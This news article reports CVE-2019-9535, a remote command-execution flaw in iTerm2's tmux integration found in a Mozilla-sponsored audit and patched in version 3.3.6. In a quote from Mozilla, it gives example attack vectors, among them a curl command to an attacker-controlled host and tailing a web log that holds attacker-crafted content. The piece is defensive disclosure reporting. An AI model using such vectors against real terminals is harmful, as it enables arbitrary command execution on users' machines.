Yesterday, Mozilla announced that a critical security vulnerability affects the terminal multiplexer (tmux) integration feature in all versions of iTerm2, the GPL-licensed terminal emulator for macOS.
The vulnerability was found through a security audit sponsored by the Mozilla Open Source Support Program (MOSS), which delivers security audits for open source technologies. Mozilla and iTerm2’s developer, George Nachman, together developed a patch for the vulnerability and released it in iTerm2 version 3.3.6.
According to the official blog post, MOSS sponsored the iTerm2 security audit because of its popularity among developers and system administrators. Another major reason was iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years.
An attacker who can cause malicious output to be produced in the targeted user’s terminal can exploit this vulnerability (CVE-2019-9535) to remotely execute arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”
Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended that all users upgrade iTerm2 to the latest version, 3.3.6.
The CERT Coordination Center has pointed out that, since the tmux integration cannot be disabled through configuration, a complete resolution to this vulnerability is not yet available.
Users have expressed appreciation to both Mozilla and the iTerm2 team for the security update.
A user commented on Hacker News, “I checked for update, installed and relaunched… and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.”
Another user says, “Thank you, Mozilla. =)”
Visit the Mozilla blog for more details about the vulnerability.